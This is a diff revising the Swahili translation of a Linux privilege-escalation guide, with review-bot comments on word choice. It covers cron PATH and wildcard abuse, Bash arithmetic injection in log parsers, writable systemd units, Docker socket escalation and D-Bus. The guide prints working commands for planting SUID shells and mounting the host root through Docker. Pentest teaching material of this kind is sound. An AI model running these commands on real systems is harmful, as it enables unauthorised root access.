@@ -355,24 +355,24 @@ cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/nul Kwa mfano, ndani ya _/etc/crontab_ unaweza kupata PATH: _PATH=**/home/user**:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin_ -(_Kumbuka jinsi user ana ruhusa za kuandika juu ya /home/user_) +(_Kumbuka jinsi mtumiaji "user" ana ruhusa za kuandika juu ya /home/user_) -Ikiwa ndani ya crontab hii mtumiaji root anajaribu kutekeleza amri au script bila kuweka PATH. Kwa mfano: _\* \* \* \* root overwrite.sh_\ +Iwapo ndani ya crontab hii mtumiaji root anajaribu kutekeleza amri au script bila kuweka path. Kwa mfano: _\* \* \* \* root overwrite.sh_\ Kisha, unaweza kupata shell ya root kwa kutumia: ```bash echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh #Wait cron job to be executed /tmp/bash -p #The effective uid and gid to be set to the real uid and gid ``` -### Cron ikitumia script yenye wildcard (Wildcard Injection) +### Cron ikitumia script na wildcard (Wildcard Injection) -Kama script inayotekelezwa na root ina “**\***” ndani ya amri, unaweza kuitumia kupata matokeo yasiyotarajiwa (kama privesc). Mfano: +Kama script inapoendeshwa na root na ina “**\***” ndani ya amri, unaweza kuitumia kufanya mambo yasiyotegemewa (kama privesc). Mfano: ```bash rsync -a *.sh rsync://host.back/src/rbd #You can create a file called "-e sh myscript.sh" so the script will execute our script ``` -**Ikiwa wildcard imeongozwa na njia kama** _**/some/path/\***_ **, haiko hatarini (hata** _**./\***_ **sio).** +**Ikiwa wildcard imewekwa kabla ya njia kama** _**/some/path/\***_ **, haiko hatarini (hata** _**./\***_ **sio).** -Soma ukurasa ufuatao kwa mbinu zaidi za kutumia wildcards: +Soma ukurasa ufuatao kwa mbinu za ziada za wildcard exploitation: {{#ref}} 
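Review bot: `+**Ikiwa wildcard imewekwa kabla ya njia kama** _**/some/path/\***_ ...` inverts the condition: `imewekwa kabla ya njia` means "the wildcard is placed before the path", whereas the point is that the wildcard is preceded by a path (`/some/path/*`), which is exactly why it is not exploitable. Use `imetanguliwa na njia kama` (or the previous `imeongozwa na njia`). The added clarification `mtumiaji "user" ana ruhusa za kuandika juu ya /home/user` is a good change, since `user` is both the account name and the path component in the `PATH=/home/user:...` example.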
@@ -382,11 +382,11 @@ wildcards-spare-tricks.md ### Bash arithmetic expansion injection in cron log parsers -Bash performs parameter expansion and command substitution before arithmetic evaluation in ((...)), $((...)) and let. If a root cron/parser reads untrusted log fields and feeds them into an arithmetic context, an attacker can inject a command substitution $(...) that executes as root when the cron runs. +Bash hufanya parameter expansion na command substitution kabla ya arithmetic evaluation katika ((...)), $((...)) na let. Ikiwa root cron/parser inasoma fields za logi zisizotegemewa na kuziingiza katika muktadha wa arithmetic, mshambuliaji anaweza kuingiza command substitution $(...) ambayo inatekelezwa kama root wakati cron inapoendesha. -- Kwanini inafanya kazi: Katika Bash, expansions hufanyika kwa mpangilio huu: parameter/variable expansion, command substitution, arithmetic expansion, kisha word splitting na pathname expansion. Kwa hivyo thamani kama `$(/bin/bash -c 'id > /tmp/pwn')0` kwanza inayobadilishwa (kiafanye amri), kisha nambari iliyobaki `0` inatumiwa kwa arithmetic ili script iendelee bila makosa. +- Kwa nini inafanya kazi: In Bash, expansions hufanyika kwa mpangilio huu: parameter/variable expansion, command substitution, arithmetic expansion, kisha word splitting na pathname expansion. Hivyo thamani kama `$(/bin/bash -c 'id > /tmp/pwn')0` kwanza inabadilishwa (ikiumba command), kisha nambari iliyobaki `0` inatumiwa kwa arithmetic ili script iendelee bila makosa. -- Typical vulnerable pattern: +- Mfano wa kawaida unaoathirika: ```bash #!/bin/bash # Example: parse a log and "sum" a count field coming from the log 
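Review bot: in `+- Kwa nini inafanya kazi: In Bash, expansions hufanyika kwa mpangilio huu: ...` the phrase `In Bash` was left in English (the old line had `Katika Bash`). In the same line `(ikiumba command)` is the wrong word: `kuumba` means to create, while the source means running the command substitution; `(ikiendesha amri)` is the intended sense. The technical statement itself is correct: parameter expansion and command substitution happen before arithmetic evaluation, so `$(...)0` runs the substitution and leaves `0` for the arithmetic to consume.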
@@ -396,7 +396,7 @@ while IFS=',' read -r ts user count rest; do done < /var/www/app/log/application.log ``` -- Utekelezaji: Pata maandishi yanayodhibitiwa na mshambuliaji yandikwe kwenye log iliyochambuliwa ili uwanja unaoonekana kuwa nambari uwe na command substitution na uishie na tarakimu. Hakikisha amri yako haichapishi kwenye stdout (au iielekeze) ili arithmetic ibaki halali. +- Exploitation: Pata maandishi yanayotumika na mshambuliaji yaandikwe kwenye logi inayochambuliwa ili uwanja unaonekana kama nambari uwe na command substitution na uishe kwa tarakimu. Hakikisha amri yako haichapishi kwa stdout (au izielekeze) ili arithmetic ibaki halali. ```bash # Injected field value inside the log (e.g., via a crafted HTTP request that the app logs verbatim): $(/bin/bash -c 'cp /bin/bash /tmp/sh; chmod +s /tmp/sh')0 
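Review bot: `+- Exploitation: Pata maandishi yanayotumika na mshambuliaji yaandikwe kwenye logi ...` weakens "attacker-controlled text" to "text used by the attacker"; the old `yanayodhibitiwa na mshambuliaji` is the correct rendering and should stay, since the whole point is that the attacker controls the bytes that land in the parsed field. `(au izielekeze)` should be `(au iielekeze)` to agree with the singular `amri yako`. The bullet label `Exploitation:` is also left in English where the previous line had `Utekelezaji:`.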
@@ -405,62 +405,62 @@ $(/bin/bash -c 'cp /bin/bash /tmp/sh; chmod +s /tmp/sh')0 ### Cron script overwriting and symlink -If you **can modify a cron script** executed by root, you can get a shell very easily: +Ikiwa unaweza **can modify a cron script** executed by root, unaweza kupata shell kwa urahisi sana: ```bash echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > #Wait until it is executed /tmp/bash -p ``` -Ikiwa script inayotekelezwa na root inatumia **directory ambapo una ufikiaji kamili**, inaweza kuwa ya msaada kufuta folda hiyo na **kuunda folda ya symlink kuelekea nyingine** inayohudumia script unayodhibiti +Ikiwa script inayotekelezwa na root inatumia **directory ambapo una upatikanaji kamili**, inaweza kuwa muhimu kufuta folder hiyo na **kuunda symlink folder kuelekea nyingine** inayohudumia script unaodhibiti. ```bash ln -d -s ``` ### Cron jobs za mara kwa mara -Unaweza kufuatilia michakato ili kutafuta zile zinazotekelezwa kila dakika 1, 2 au 5. Labda unaweza kuchukua fursa yake na escalate privileges. +Unaweza kufuatilia processes ili kutafuta zile zinazotekelezwa kila dakika 1, 2 au 5. Huenda ukaweza kutumia fursa hiyo na escalate privileges. -Kwa mfano, ili **kuangalia kila 0.1s kwa muda wa dakika 1**, **panga kwa amri zilizotekelezwa kwa idadi ndogo** na futa amri zilizoendeshwa zaidi, unaweza kufanya: +Kwa mfano, ili **kutazama kila 0.1s kwa muda wa dakika 1**, **kupanga kwa amri zilizotekelezwa kidogo** na kufuta amri zilizotekelezwa zaidi, unaweza kufanya: ```bash for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp; ``` -**Unaweza pia kutumia** [**pspy**](https://github.com/DominicBreuker/pspy/releases) (hii itafuatilia na kuorodhesha kila process inayoanza). 
+**Unaweza pia kutumia** [**pspy**](https://github.com/DominicBreuker/pspy/releases) (hii itafuatilia na kuorodhesha kila process itakayozinduka). ### Cron jobs zisizoonekana -Inawezekana kuunda cronjob **kwa kuweka carriage return baada ya comment** (bila newline character), na cronjob itafanya kazi. Mfano (zingatia carriage return char): +Inawezekana kuunda cronjob **kwa kuweka carriage return baada ya comment** (bila newline character), na cron job itafanya kazi. Mfano (angalia carriage return char): ```bash #This is a comment inside a cron config file\r* * * * * echo "Surprise!" ``` ## Huduma -### Fayili za _.service_ zinazoweza kuandikwa +### Faili za _.service_ Zinazoweza Kuandikwa -Angalia kama unaweza kuandika faili yoyote ya `.service`, ikiwa unaweza, unaweza **kuibadilisha** ili **itekeleze** **backdoor yako wakati** huduma inapokuwa **anzishwa**, **ianzishwe upya** au **isimamiswe** (labda utahitaji kusubiri mpaka mashine ianzishwe upya).\ -Kwa mfano tengeneza backdoor yako ndani ya faili ya .service kwa **`ExecStart=/tmp/script.sh`** +Angalia kama unaweza kuandika faili yoyote ya `.service`. Ikiwa unaweza, unaweza **kuibadilisha** ili iweze **kutekeleza** backdoor yako wakati huduma inapo **anzishwa**, **ianzishwa upya** au **simamishwa** (labda utahitaji kusubiri hadi mashine ianze upya).\ +Kwa mfano, tengeneza backdoor yako ndani ya faili ya .service kwa **`ExecStart=/tmp/script.sh`** -### Binary za huduma zinazoweza kuandikwa +### Binaries za huduma zinazoweza kuandikwa -Kumbuka kwamba ikiwa una **idhini ya kuandika kwa binaries zinazotekelezwa na services**, unaweza kuzibadilisha kuwa backdoors, hivyo wakati services zitakapotekelezwa tena backdoors zitatekelezwa. +Kumbuka kwamba ikiwa una **idhini ya kuandika juu ya binaries zinazotekelezwa na huduma**, unaweza kuzibadilisha kuwa backdoor, hivyo wakati huduma zitakaporudi kutekelezwa backdoor nayo itatekelezwa. 
### systemd PATH - Relative Paths -Unaweza kuona PATH inayotumiwa na **systemd** kwa: +Unaweza kuona PATH inayotumika na **systemd** kwa: ```bash systemctl show-environment ``` -Ikiwa utagundua kuwa unaweza **kuandika** katika yoyote ya folda za njia, unaweza kuwa na uwezo wa **escalate privileges**. Unahitaji kutafuta **relative paths being used on service configurations** katika faili kama: +Ikiwa ugundua kwamba unaweza **kuandika** katika folda yoyote ya njia hiyo, huenda ukaweza **kupandisha ruhusa**. Unahitaji kutafuta **njia zinazorejea zinazotumika kwenye faili za usanidi wa huduma** kama: ```bash ExecStart=faraday-server ExecStart=/bin/sh -ec 'ifup --allow=hotplug %I; ifquery --state %I' ExecStop=/bin/sh "uptux-vuln-bin3 -stuff -hello" ``` -Kisha, tengeneza **executable** yenye **jina lile lile kama binary ya relative path** ndani ya systemd PATH folder ambayo unaweza kuandika, na wakati service itaombwa kutekeleza kitendo kilicho hatarini (**Start**, **Stop**, **Reload**), **backdoor** yako itaendeshwa (watumiaji wasio na ruhusa kawaida hawawezi kuanza/kuzima services lakini angalia kama unaweza kutumia `sudo -l`). +Kisha, tengeneza **kifaili kinachoendeshwa** chenye **same name as the relative path binary** ndani ya systemd PATH folder unayoweza kuandika, na wakati service itakapoulizwa kutekeleza kitendo hatarishi (**Anza**, **Simamisha**, **Pakia upya**), **backdoor yako itaendeshwa** (watumiaji wasiokuwa na ruhusa kwa kawaida hawawezi kuanza/kuacha services lakini angalia ikiwa unaweza kutumia `sudo -l`). **Jifunze zaidi kuhusu services kwa `man systemd.service`.** ## **Timers** -**Timers** ni faili za unit za systemd ambazo jina lao linaisha na `**.timer**` na zinadhibiti faili za `**.service**` au matukio. **Timers** zinaweza kutumika kama mbadala kwa cron kwa kuwa zina msaada uliojengwa kwa ajili ya matukio ya kalenda na matukio ya wakati monotonic na zinaweza kuendeshwa kwa asynchronous. 
+**Timers** ni systemd unit files whose name ends in `**.timer**` that control `**.service**` files or events. **Timers** zinaweza kutumika kama mbadala wa cron kwani zina msaada uliojengwa kwa ajili ya matukio ya kalenda na matukio ya wakati monotonic na zinaweza kuendeshwa asynchronously. Unaweza kuorodhesha timers zote kwa: ```bash 
@@ -468,58 +468,58 @@ systemctl list-timers --all ``` ### Timers zinazoweza kuandikwa -Kama unaweza kubadilisha timer, unaweza kuifanya itekeleze baadhi ya units za systemd.unit (kama `.service` au `.target`) +Ikiwa unaweza kubadilisha timer, unaweza kuifanya itekeleze baadhi ya vitu vilivyopo vya systemd.unit (kama `.service` au `.target`) ```bash Unit=backdoor.service ``` -Kwenye nyaraka unaweza kusoma ni nini Unit: +Katika nyaraka unaweza kusoma ni nini Unit inamaanisha: -> Unit itakayoanzishwa wakati timer hii inapoisha. Hoja ni jina la unit, ambayo sufiksi yake si ".timer". Iwapo haitatajwi, thamani hii kwa kawaida inabaki kuwa service yenye jina lile lile kama timer unit, isipokuwa kwa sufiksi. (Angalia hapo juu.) Inapendekezwa kwamba jina la unit linaloanzishwa na jina la timer unit liwe sawa, isipokuwa kwa sufiksi. +> Kitengo cha kuanzishwa wakati timer hii itakapomalizika. Hoja ni jina la unit, kiambishi mwisho chake si ".timer". Ikiwa haitajwi, thamani hii kwa kawaida itakuwa service ambayo ina jina sawa na unit ya timer, isipokuwa kwa kiambishi mwisho. (Angalia hapo juu.) Inapendekezwa kwamba jina la unit linaloanzishwa na jina la unit ya timer liwe sawa kabisa, isipokuwa kwa kiambishi mwisho. 
-Kwa hiyo, ili kutumia vibaya ruhusa hii utahitaji: +Kwa hivyo, ili kutumia vibaya ruhusa hii unahitaji: -- Tafuta systemd unit fulani (kama a `.service`) ambayo inatekeleza **binary inayoweza kuandikwa** -- Tafuta systemd unit fulani ambayo inatekeleza **relative path** na una **idhini za kuandika** juu ya **systemd PATH** (ili kujifanya executable hiyo) +- Tafuta unit ya systemd (kama `.service`) ambayo inatekeleza **binary inayoweza kuandikwa** +- Tafuta unit ya systemd ambayo inatekeleza **relative path** na uko na **idhini za kuandika** juu ya **systemd PATH** (ili kujifanya executable hiyo) -**Jifunze zaidi kuhusu timers kwa `man systemd.timer`.** +**Jifunze zaidi kuhusu timers kwa kutumia `man systemd.timer`.** ### **Kuwezesha Timer** -Ili kuwezesha timer unahitaji ruhusa za root na kutekeleza: +Ili kuwezesha timer unahitaji ruhusa za root na kuendesha: ```bash sudo systemctl enable backu2.timer Created symlink /etc/systemd/system/multi-user.target.wants/backu2.timer → /lib/systemd/system/backu2.timer. ``` -Note the **timer** is **activated** by creating a symlink to it on `/etc/systemd/system/.wants/.timer` +Kumbuka the **timer** ina **amilishwa** kwa kuunda symlink yake kwenye `/etc/systemd/system/.wants/.timer` ## Sockets -Unix Domain Sockets (UDS) huwezesha **mawasiliano ya michakato** kwenye mashine ile ile au tofauti ndani ya modeli za client-server. Zinatumia faili za descriptor za Unix kwa mawasiliano kati ya kompyuta na zinaanzishwa kupitia `.socket` files. +Unix Domain Sockets (UDS) zinawezesha **mawasiliano ya mchakato** kwenye mashine ile ile au tofauti ndani ya miundo ya client-server. Zinatumia faili za kiashiria za Unix za mawasiliano kati ya kompyuta na zinaanzishwa kupitia `.socket` files. Sockets zinaweza kusanidiwa kwa kutumia `.socket` files. 
-**Learn more about sockets with `man systemd.socket`.** Ndani ya faili hii, vigezo kadhaa vya kuvutia vinaweza kusanidiwa: +**Jifunze zaidi kuhusu sockets kwa `man systemd.socket`.** Ndani ya faili hii, vigezo kadhaa vya kuvutia vinaweza kusanidiwa: -- `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: Chaguzi hizi ni tofauti lakini kwa muhtasari zinatumika **kueleza mahali zitakaposikiliza** socket (njia ya faili ya AF_UNIX socket, IPv4/6 na/au nambari ya port kusikiliza, n.k.) -- `Accept`: Inachukua hoja ya boolean. Ikiwa **true**, **instance ya service itaanzishwa kwa kila muunganisho unaokuja** na socket ya muunganisho tu ndiyo itapitishwa kwake. Ikiwa **false**, sockets zote za kusikiliza zenyewe zina **pitishwa kwa service unit iliyozinduliwa**, na service unit moja tu itaanzishwa kwa muunganisho yote. Thamani hii hairuhusiwi kwa datagram sockets na FIFOs ambapo service unit moja inashughulikia trafiki yote inayokuja bila masharti. **Chaguo-msingi ni false**. Kwa sababu za utendaji, inashauriwa kuunda daemons mpya kwa njia inayofaa kwa `Accept=no`. -- `ExecStartPre`, `ExecStartPost`: Zinachukua mstari mmoja au zaidi wa amri, ambazo zinafanywa **kabla** au **baada** sockets/FIFOs za kusikiliza **kuundwa** na kufungwa kwa mfululizo. Token ya kwanza ya mstari wa amri lazima iwe jina la faili kamili (absolute filename), ikifuatiwa na hoja za mchakato. -- `ExecStopPre`, `ExecStopPost`: Amri za ziada ambazo zinafanywa **kabla** au **baada** sockets/FIFOs za kusikiliza **kufungwa** na kuondolewa, mtawalia. -- `Service`: Inaainisha jina la unit ya **service** itakayoanzishwa pale inapopokea trafiki inayokuja. Mipangilio hii inaruhusiwa tu kwa sockets zenye Accept=no. Chaguo-msingi ni service yenye jina sawa na socket (na kiambatanisho kimebadilishwa). Katika kesi nyingi, haitakuwa lazima kutumia chaguo hili. 
+- `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: Chaguzi hizi ni tofauti, lakini muhtasari hutumika ili **kuonyesha mahali itakayosikiliza** socket (njia ya faili ya AF_UNIX ya socket, IPv4/6 na/au nambari ya bandari kusikiliza, n.k.) +- `Accept`: Inachukua hoja ya boolean. Ikiwa **true**, **service instance inazaliwa kwa kila muunganisho unaoingia** na socket ya muunganisho tu ndiyo hupitishwa kwake. Ikiwa **false**, sockets zote zinasikilizwa zinapitwa kwa **service unit iliyozinduliwa**, na service unit moja tu inazaliwa kwa muunganisho wote. Thamani hii haisiwahi kwa datagram sockets na FIFOs ambapo service unit moja bila sharti hushughulikia trafiki yote inayokuja. **Defaults to false**. Kwa sababu za utendaji, inapendekezwa kuandika daemons mpya kwa njia inayofaa kwa `Accept=no`. +- `ExecStartPre`, `ExecStartPost`: Zinachukua mstari wa amri mmoja au zaidi, ambayo **hutekelezwa kabla** au **baada** sockets/FIFOs za kusikiliza zinapoundwa na kuunganishwa, mtawalia. Kielelezo cha kwanza cha mstari wa amri lazima kiwe jina kamili la faili, kisha kufuatwa na hoja za mchakato. +- `ExecStopPre`, `ExecStopPost`: Amri za ziada ambazo **hutekelezwa kabla** au **baada** sockets/FIFOs za kusikiliza zinapofungwa na kuondolewa, mtawalia. +- `Service`: Inabainisha jina la **service** unit **kuamsha** juu ya **trafiki inayokuja**. Mipangilio hii inaruhusiwa tu kwa sockets zenye Accept=no. Inatumiwa kwa kutumia service yenye jina sawa na socket (na kiongezi kikibadilishwa). Katika mengi ya matukio, haitakuwa muhimu kutumia chaguo hili. -### Writable .socket files +### Faili za .socket zinazoweza kuandikwa -Ikiwa utapata faili ya `.socket` ambayo ni **writable**, unaweza **ongeza** mwanzoni mwa sehemu ya `[Socket]` kitu kama: `ExecStartPre=/home/kali/sys/backdoor` na backdoor itatekelezwa kabla socket kuundwa. 
Kwa hivyo, **huenda utahitaji kusubiri hadi mashine izinduliwe upya.**\ -_Note that the system must be using that socket file configuration or the backdoor won't be executed_ +Ikiwa utapata faili ya `.socket` inayoweza kuandikwa, unaweza **kuongeza** mwanzoni mwa sehemu ya `[Socket]` kitu kama: `ExecStartPre=/home/kali/sys/backdoor` na backdoor itatekelezwa kabla socket itakapoundwa. Kwa hiyo, **huenda utahitaji kusubiri hadi mashine ianzishwe upya.**\ +_Kumbuka kwamba mfumo lazima uwe ukitumia usanidi huo wa faili ya socket au backdoor haitatekelezwa_ -### Writable sockets +### Sockets zinazoweza kuandikwa -Ikiwa **unatambua socket yoyote inayoweza kuandikwa** (_sasa tunazungumzia Unix Sockets na sio faili za konfigurishaji `.socket`_), basi **unaweza kuwasiliana** na socket hiyo na labda kutumia udhaifu. +Ikiwa **utatambua socket yoyote inayoweza kuandikwa** (_sasa tunazungumzia Unix Sockets na si kuhusu faili za usanidi `.socket`_), basi **unaweza kuwasiliana** na socket hiyo na labda kutumia udhaifu. -### Enumerate Unix Sockets +### Orodhesha Unix Sockets ```bash netstat -a -p --unix ``` -### Muunganisho ghafi +### Muunganisho wa ghafi ```bash #apt-get install netcat-openbsd nc -U /tmp/socket #Connect to UNIX-domain stream socket @@ -528,7 +528,7 @@ nc -uU /tmp/socket #Connect to UNIX-domain datagram socket #apt-get install socat socat - UNIX-CLIENT:/dev/socket #connect to UNIX-domain socket, irrespective of its type ``` -**Mfano la matumizi mabaya:** +**Exploitation example:** {{#ref}} 
@@ -537,48 +537,48 @@ socket-command-injection.md ### HTTP sockets -Fahamu kuwa kunaweza kuwa na baadhi ya **sockets zinazolisikiza HTTP** maombi (_sizungumzii kuhusu .socket files lakini kuhusu faili zinazofanya kazi kama unix sockets_). Unaweza kuangalia hili kwa: +Kumbuka kwamba kunaweza kuwa na baadhi ya **sockets listening for HTTP** requests (_Sio ninaozungumzia .socket files, bali files zinazofanya kazi kama unix sockets_). Unaweza kuangalia hili kwa: ```bash curl --max-time 2 --unix-socket /pat/to/socket/files http:/index ``` -If the socket **inajibu kwa ombi la HTTP**, basi unaweza **kuwasiliana** nayo na labda **exploit some vulnerability**. +If the socket **responds with an HTTP** request, then you can **kuwasiliana** with it and maybe **exploit some vulnerability**. -### Docker Socket Inayoweza Kuandikwa +### Socket ya Docker inayoweza kuandikwa -The Docker socket, often found at `/var/run/docker.sock`, ni faili muhimu ambayo inapaswa kulindwa. Kwa default, it's writable by the `root` user and members of the `docker` group. Kuwa na write access kwenye socket hii kunaweza kusababisha privilege escalation. Hapa kuna muhtasari wa jinsi hili linaweza kufanywa na mbinu mbadala ikiwa Docker CLI haipo. +The Docker socket, often found at `/var/run/docker.sock`, ni faili muhimu ambayo inapaswa kulindwa. Kwa default, inaweza kuandikwa na mtumiaji `root` na wanachama wa kikundi cha `docker`. Kuwa na haki ya kuandika kwenye socket hii kunaweza kusababisha privilege escalation. Hapa kuna muhtasari wa jinsi hii inaweza kufanywa na mbinu mbadala ikiwa Docker CLI haipatikani. 
#### **Privilege Escalation with Docker CLI** -Ikiwa una write access kwenye Docker socket, unaweza escalate privileges kwa kutumia amri zifuatazo: +Ikiwa una haki ya kuandika kwenye Docker socket, unaweza escalate privileges kwa kutumia amri zifuatazo: ```bash docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh ``` -Amri hizi zinakuwezesha kuendesha container yenye upatikanaji wa root kwa filesystem ya host. +Hizi amri zinakuwezesha kuendesha container yenye ufikiaji wa root kwenye mfumo wa faili wa host. -#### **Kutumia Docker API moja kwa moja** +#### **Kutumia Docker API kwa moja kwa moja** -Katika matukio ambapo Docker CLI haipatikani, Docker socket bado inaweza kudhibitiwa kwa kutumia Docker API na amri za `curl`. +Katika matukio ambapo Docker CLI haipo, docker socket bado inaweza kudhibitiwa kwa kutumia Docker API na amri za `curl`. -1. **List Docker Images:** Pata orodha ya images zinazopatikana. +1. **List Docker Images:** Retrieve the list of available images. ```bash curl -XGET --unix-socket /var/run/docker.sock http://localhost/images/json ``` -2. **Create a Container:** Tuma ombi la kuunda container inayomount directory ya root ya mfumo wa host. +2. **Create a Container:** Send a request to create a container that mounts the host system's root directory. ```bash curl -XPOST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d '{"Image":"","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/","Target":"/host_root"}]}' http://localhost/containers/create ``` -Anzisha container uliotengenezwa hivi karibuni: +Start the newly created container: ```bash curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers//start ``` -3. 
**Attach to the Container:** Tumia `socat` kuanzisha muunganisho na container, kuruhusu utekelezaji wa amri ndani yake. +3. **Attach to the Container:** Use `socat` to establish a connection to the container, enabling command execution within it. ```bash socat - UNIX-CONNECT:/var/run/docker.sock @@ -588,13 +588,13 @@ Connection: Upgrade Upgrade: tcp ``` -Baada ya kuweka muunganisho wa `socat`, unaweza kuendesha amri moja kwa moja ndani ya container ukiwa na upatikanaji wa root kwa filesystem ya host. +Baada ya kuanzisha muunganisho wa `socat`, unaweza kutekeleza amri moja kwa moja ndani ya container ukiwa na ufikiaji wa root kwenye mfumo wa faili wa host. -### Mengine +### Wengine -Kumbuka kwamba ikiwa una write permissions juu ya docker socket kwa sababu uko **inside the group `docker`** una [**more ways to escalate privileges**](interesting-groups-linux-pe/index.html#docker-group). If the [**docker API is listening in a port** you can also be able to compromise it](../../network-services-pentesting/2375-pentesting-docker.md#compromising). +Kumbuka kwamba ikiwa una ruhusa za kuandika juu ya docker socket kwa sababu uko **inside the group `docker`** una [**more ways to escalate privileges**](interesting-groups-linux-pe/index.html#docker-group). Ikiwa [**docker API is listening in a port** you can also be able to compromise it](../../network-services-pentesting/2375-pentesting-docker.md#compromising). -Angalia **more ways to break out from docker or abuse it to escalate privileges** katika: +Angalia **more ways to break out from docker or abuse it to escalate privileges** in: {{#ref}} @@ -603,7 +603,7 @@ docker-security/ ## Containerd (ctr) privilege escalation -If you find that you can use the **`ctr`** command read the following page as **you may be able to abuse it to escalate privileges**: +Ikiwa utagundua kuwa unaweza kutumia amri ya **`ctr`**, soma ukurasa ufuatao kwani **you may be able to abuse it to escalate privileges**: {{#ref}} 
@@ -612,7 +612,7 @@ containerd-ctr-privilege-escalation.md ## **RunC** privilege escalation -If you find that you can use the **`runc`** command read the following page as **you may be able to abuse it to escalate privileges**: +Ikiwa utagundua kuwa unaweza kutumia amri ya **`runc`**, soma ukurasa ufuatao kwani **you may be able to abuse it to escalate privileges**: {{#ref}} 
@@ -621,15 +621,15 @@ runc-privilege-escalation.md ## **D-Bus** -D-Bus ni mfumo wa hali ya juu wa Inter-Process Communication (IPC) unaowawezesha applications kuingiliana na kubadilishana data kwa ufanisi. Umeundwa kwa kuzingatia mfumo wa kisasa wa Linux, na kutoa mfumo imara kwa aina tofauti za mawasiliano kati ya applications. +D-Bus ni mfumo mgumu wa **inter-Process Communication (IPC)** unaowezesha applications kuingiliana na kushirikiana data kwa ufanisi. Umebuniwa kwa kuzingatia mfumo wa kisasa wa Linux, na hutoa mfumo imara kwa aina mbalimbali za mawasiliano ya applications. -Mfumo ni wenye ufanisi mkubwa, ukisaidia IPC ya msingi ambayo inaboresha kubadilishana data kati ya processes, kumbu-kumbu ya **enhanced UNIX domain sockets**. Zaidi ya hayo, husaidia kutangaza matukio au signals, hivyo kuimarisha muunganiko wa vipengele vya mfumo. Kwa mfano, ishara kutoka kwa Bluetooth daemon kuhusu simu inayokuja inaweza kusababisha music player kutulia, kuboresha uzoefu wa mtumiaji. Pia, D-Bus ina support kwa remote object system, ikirahisisha maombi ya service na invocation za method kati ya applications, na kurahisisha michakato ambayo hapo awali ilikuwa ngumu. +Mfumo huu ni mwingiliano, unaounga mkono IPC za msingi zinazoongeza kubadilishana data kati ya michakato, ukikumbusha **enhanced UNIX domain sockets**. Zaidi ya hayo, husaidia katika kutangaza matukio au ishara, kukuza muunganisho laini kati ya vipengele vya mfumo. Kwa mfano, ishara kutoka kwa Bluetooth daemon kuhusu simu inayokuja inaweza kusababisha music player kutulia, kuboresha uzoefu wa mtumiaji. Aidha, D-Bus inasaidia mfumo wa remote object, unaorahisisha mahitaji ya huduma na invocation za method kati ya applications, kurahisisha michakato ambayo hapo awali ilikuwa ngumu. -D-Bus inaendeshwa kwa **allow/deny model**, ikisimamia ruhusa za ujumbe (miito ya method, utoaji wa signal, n.k.) kulingana na athari ya jumla ya sheria za sera zinazolingana. 
Sera hizi zinaelezea mwingiliano na bus, na zinaweza kuwezesha privilege escalation kupitia unyonyaji wa ruhusa hizi. +D-Bus inafanya kazi kwa modeli ya allow/deny, ikisimamia ruhusa za ujumbe (method calls, signal emissions, nk.) kulingana na athari ya jumla ya sheria za sera zinazolingana. Sera hizi zinaelezea mwingiliano na bus, na zinaweza kuruhusu privilege escalation kupitia matumizi mabaya ya ruhusa hizi. -Mfano wa sera kama hizo katika `/etc/dbus-1/system.d/wpa_supplicant.conf` umeonyeshwa, ukielezea ruhusa kwa user root kumiliki, kutuma, na kupokea ujumbe kutoka `fi.w1.wpa_supplicant1`. +Mfano wa sera ya aina hiyo katika `/etc/dbus-1/system.d/wpa_supplicant.conf` umetolewa, ukielezea ruhusa za mtumiaji root kumiliki, kutuma, na kupokea ujumbe kutoka `fi.w1.wpa_supplicant1`. -Sera ambazo hazina user au group maalum zinatumika kwa wote, wakati sera za muktadha "default" zinatumika kwa wote wasiotajwa na sera nyingine maalum. +Sera ambazo hazina mtumiaji au kundi maalum hutumika kwa ujumla, wakati sera za muktadha wa "default" zinaweza kutumika kwa wote wasiofunikwa na sera maalum nyingine. ```xml @@ -638,7 +638,7 @@ Sera ambazo hazina user au group maalum zinatumika kwa wote, wakati sera za mukt ``` -**Jifunze jinsi ya kuorodhesha na kutumia mawasiliano ya D-Bus hapa:** +**Jifunze jinsi ya enumerate na exploit D-Bus communication hapa:** {{#ref}} d-bus-enumeration-and-command-injection-privilege-escalation.md @@ -646,9 +646,9 @@ d-bus-enumeration-and-command-injection-privilege-escalation.md ## **Mtandao** -Inavutia kila mara kuorodhesha mtandao na kubaini nafasi ya mashine. +Daima ni ya kuvutia ku enumerate mtandao na kubaini nafasi ya mashine. -### Kuorodhesha kwa jumla +### Generic enumeration ```bash #Hostname, hosts and DNS cat /etc/hostname /etc/hosts /etc/resolv.conf 
